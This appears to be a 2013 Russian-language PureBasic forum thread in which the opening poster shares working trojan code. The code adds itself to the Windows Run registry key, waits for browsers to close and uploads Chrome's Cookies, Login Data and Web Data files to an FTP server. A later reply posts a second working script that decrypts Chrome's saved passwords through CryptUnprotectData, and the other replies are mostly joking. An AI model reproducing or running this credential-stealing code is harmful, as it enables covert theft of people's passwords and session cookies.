purebasic.info

PureBasic forum
Текущее время: Сб янв 20, 2018 6:02 pm

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ Сообщений: 24 ]  На страницу 1, 2  След.
Автор Сообщение
 Заголовок сообщения: Cookies с Google Chrome
СообщениеДобавлено: Сб май 11, 2013 8:33 pm 
Не в сети
доцент

Зарегистрирован: Сб май 04, 2013 5:54 pm
Сообщений: 54
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Пункты репутации: 0
Google Chrome хранит пароли в 2 файлах: Login Data и Web Data. И задача сей программы в том, что она отсылает эти два файла плюс Cookies, мне по фтп.

Код:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
InitNetwork()
 
 
ProgName.s=ProgramFilename()
Name.s=GetFilePart(ProgName)
 
Handle = RegOpenKeyEx_(#HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", 0, #KEY_ALL_ACCESS, @hKey)
If Handle = #ERROR_SUCCESS
  RegSetValueEx_(hKey, @Name, 0, #REG_SZ, @ProgName, Len(ProgName))
  RegCloseKey_(hKey)
EndIf
 
RunAgain:
If FindWindow_("Chrome_WidgetWin_1",0) Or FindWindow_("IEFrame",0) Or  FindWindow_("OpWindow",0)
  Goto RunAgain
Else
EndIf  
 
Delay(500)
 
OpenFTP(0, "server", "login", "password")
SendFTPFile(0, "C:\Users\"+UserName()+"\AppData\Local\Google\Chrome\User Data\Default\Cookies", FormatDate("%dd:%mm:%yyyy:%hh:%ii:%ss", Date())+":Cookies-"+UserName())
SendFTPFile(0, "C:\Users\"+UserName()+"\AppData\Local\Google\Chrome\User Data\Default\Login Data", FormatDate("%dd:%mm:%yyyy:%hh:%ii:%ss", Date())+":Login Data-"+UserName())
SendFTPFile(0, "C:\Users\"+UserName()+"\AppData\Local\Google\Chrome\User Data\Default\Web Data", FormatDate("%dd:%mm:%yyyy:%hh:%ii:%ss", Date())+":Web Data-"+UserName())

[/code]


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 8:38 pm 
Не в сети
МОДЕРАТОР
Аватар пользователя

Зарегистрирован: Пн апр 09, 2007 4:53 pm
Сообщений: 11080
Благодарил (а): 4 раз.
Поблагодарили: 385 раз.
Обычно на мыло отсылают.... :D :D

_________________
Компьютер позволяет решать все те проблемы, которые до его изобретения не существовали. :) :)


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 8:40 pm 
Не в сети
доцент

Зарегистрирован: Сб май 04, 2013 5:54 pm
Сообщений: 54
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Пункты репутации: 0
Пётр писал(а):
Обычно на мыло отсылают..... :D :D

Мне по фтп удобней)) Бесплатным хостингом довольствуюсь, удобно с него качать :D


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 8:46 pm 
Не в сети
PureBasic Coder
Аватар пользователя

Зарегистрирован: Чт ноя 10, 2011 10:50 am
Сообщений: 4049
Откуда: Ростов-на-Дону
Благодарил (а): 70 раз.
Поблагодарили: 80 раз.
Пункты репутации: 24
Это что, троян? :D

_________________
Пурик - лучший язык программирования


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 8:50 pm 
Не в сети
МОДЕРАТОР
Аватар пользователя

Зарегистрирован: Пн апр 09, 2007 4:53 pm
Сообщений: 11080
Благодарил (а): 4 раз.
Поблагодарили: 385 раз.
Нет, Никита.
Это программа, загружающая файлы на FTP сервер. :D :D

_________________
Компьютер позволяет решать все те проблемы, которые до его изобретения не существовали. :) :)


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 8:52 pm 
Не в сети
доцент

Зарегистрирован: Сб май 04, 2013 5:54 pm
Сообщений: 54
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Пункты репутации: 0
Никита Однороб писал(а):
Это что, троян? :D

Фактически да) А так это как уже сказали выше :D


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 9:21 pm 
Не в сети
МОДЕРАТОР

Зарегистрирован: Вт дек 05, 2006 8:46 am
Сообщений: 6224
Благодарил (а): 16 раз.
Поблагодарили: 173 раз.
Пункты репутации: 48
JUST_EVIL писал(а):
Мне по фтп удобней))

Ага удобней. Впарь мне свой троян. Разживусь паролем от твоего FTP :D
1. А что, Хром пароли не шифрует?
2. А если портативная версия, то пароли в другом месте.
3. А почему только с Хрома? Все браузеры пароли хранят.
4. А почему если запущен браузер IE или Опера то пароли не воруем?

_________________
read-only


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 9:23 pm 
Не в сети
PureBasic Coder
Аватар пользователя

Зарегистрирован: Чт ноя 10, 2011 10:50 am
Сообщений: 4049
Откуда: Ростов-на-Дону
Благодарил (а): 70 раз.
Поблагодарили: 80 раз.
Пункты репутации: 24
kvitaliy писал(а):
Впарь мне свой троян
И мне, пожалуйста!

_________________
Пурик - лучший язык программирования


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 9:25 pm 
Не в сети
PureBasic Coder
Аватар пользователя

Зарегистрирован: Чт ноя 10, 2011 10:50 am
Сообщений: 4049
Откуда: Ростов-на-Дону
Благодарил (а): 70 раз.
Поблагодарили: 80 раз.
Пункты репутации: 24
kvitaliy писал(а):
1. А что, Хром пароли не шифрует?
Но автозаполнение работает, значит, не шифрует :(

_________________
Пурик - лучший язык программирования


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 9:35 pm 
Не в сети
доцент

Зарегистрирован: Сб май 04, 2013 5:54 pm
Сообщений: 54
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Пункты репутации: 0
kvitaliy писал(а):
JUST_EVIL писал(а):
Мне по фтп удобней))

Ага удобней. Впарь мне свой троян. Разживусь паролем от твоего FTP :D
1. А что, Хром пароли не шифрует?
2. А если портативная версия, то пароли в другом месте.
3. А почему только с Хрома? Все браузеры пароли хранят.
4. А почему если запущен браузер IE или Опера то пароли не воруем?

Хех :D
1. Не знаю, не знаю, но если закинуть все эти файлы к себе, то все работает.
2. Возможно, но я писал для одного человека, так что прога на 1 раз.
3. Потому что мне надо с хрома забрать их)
4. Если хром запущен, то нельзя открыть те файлы.

Я бы мог ее довести до ума, но не нужна она мне) Жалко пароли чужие воровать :D


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 9:40 pm 
Не в сети
МОДЕРАТОР

Зарегистрирован: Вт дек 05, 2006 8:46 am
Сообщений: 6224
Благодарил (а): 16 раз.
Поблагодарили: 173 раз.
Пункты репутации: 48
JUST_EVIL писал(а):
Если хром запущен, то нельзя открыть те файлы.

Так я же и спросил по этому:
А почему если запущен браузер IE или Опера то пароли не воруем?
Это другие браузеры, не Хром.

_________________
read-only


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 9:45 pm 
Не в сети
доцент

Зарегистрирован: Сб май 04, 2013 5:54 pm
Сообщений: 54
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Пункты репутации: 0
kvitaliy писал(а):
JUST_EVIL писал(а):
Если хром запущен, то нельзя открыть те файлы.

Так я же и спросил по этому:
А почему если запущен браузер IE или Опера то пароли не воруем?
Это другие браузеры, не Хром.

Они мне не нужны :)


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 9:55 pm 
Не в сети
PureBasic Coder
Аватар пользователя

Зарегистрирован: Чт ноя 10, 2011 10:50 am
Сообщений: 4049
Откуда: Ростов-на-Дону
Благодарил (а): 70 раз.
Поблагодарили: 80 раз.
Пункты репутации: 24
Так ты мне трояна скомпилированного скинешь? Я проверить хочу :D

_________________
Пурик - лучший язык программирования


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 9:58 pm 
Не в сети
доцент

Зарегистрирован: Сб май 04, 2013 5:54 pm
Сообщений: 54
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Пункты репутации: 0
Никита Однороб писал(а):
Так ты мне трояна скомпилированного скинешь? Я проверить хочу :D

Могу скинуть, только права сделаю только на запись на фтп аккаунте :D


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб май 11, 2013 10:16 pm 
Не в сети
профессор

Зарегистрирован: Пн июл 04, 2011 7:38 am
Сообщений: 738
Откуда: Россия
Благодарил (а): 29 раз.
Поблагодарили: 9 раз.
Пункты репутации: 0
Есть вариант полегче (работало в 4.51, в других не знаю)

Код:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
 
Enumeration
  #Database
  #Crypt32
EndEnumeration  
 
Structure CHROMIUM
  value1.s{256}
  value2.s{128}
  value3.s{128}
EndStructure  
 
Structure DATA_BLOB
  Size.l
  *Blob
EndStructure
 
Procedure.s UnprotectData(*Blob, Size.l)
  Protected Indata.DATA_BLOB, Outdata.DATA_BLOB
  Indata\Blob = *Blob
  Indata\Size = Size
  If OpenLibrary(#Crypt32, "crypt32.dll")
    If CallFunction(#Crypt32, "CryptUnprotectData", @Indata, 0, 0, 0, 0, 1, @Outdata)
      ProcedureReturn PeekS(Outdata\Blob, Outdata\Size, #PB_Ascii)
    EndIf
  EndIf  
  ProcedureReturn ""
EndProcedure  
 
Procedure.i Chromium_PasswordRecovery(File.s, *Proc)
  Protected Dim Blob.b(0), Result.i, Size.q, cdata.CHROMIUM
  If UseSQLiteDatabase()
    If OpenDatabase(#Database, File, "", "", #PB_Database_SQLite)
      If DatabaseQuery(#Database, "SELECT origin_url, username_value, password_value FROM logins")
        While NextDatabaseRow(#Database)
          cdata\value1 = GetDatabaseString(#Database, 0)
          cdata\value2 = GetDatabaseString(#Database, 1)
          Size = DatabaseColumnSize(#Database, 2)
          ReDim Blob(Size)
          If GetDatabaseBlob(#Database, 2, @Blob(0), Size)
            cdata\value3 = UnprotectData(@Blob(0), Size)
          EndIf
          ReDim Blob(0)
          CallFunctionFast(*Proc, @cdata)
        Wend
        Result = 1
        FinishDatabaseQuery(#Database)
      EndIf  
      CloseDatabase(#Database)
    EndIf
  EndIf  
  ProcedureReturn Result
EndProcedure  
 
Procedure Test(*Param)
  Protected *cdata.CHROMIUM = *Param
  Debug *cdata\value1
  Debug *cdata\value2
  Debug *cdata\value3
  Debug ""
EndProcedure  
 
Chromium_PasswordRecovery("D:\Documents and Settings\путь до файла\Login Data", @Test())
 



Вернуться наверх
 Профиль  
 
Показать сообщения за:  Сортировать по:  
Начать новую тему Ответить на тему  [ Сообщений: 24 ]  На страницу 1, 2  След.

Часовой пояс: UTC + 3 часа


Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
cron
Создано на основе phpBB® Forum Software © phpBB Group (блог о phpBB)
Сборка создана CMSart Studio
Русская поддержка phpBB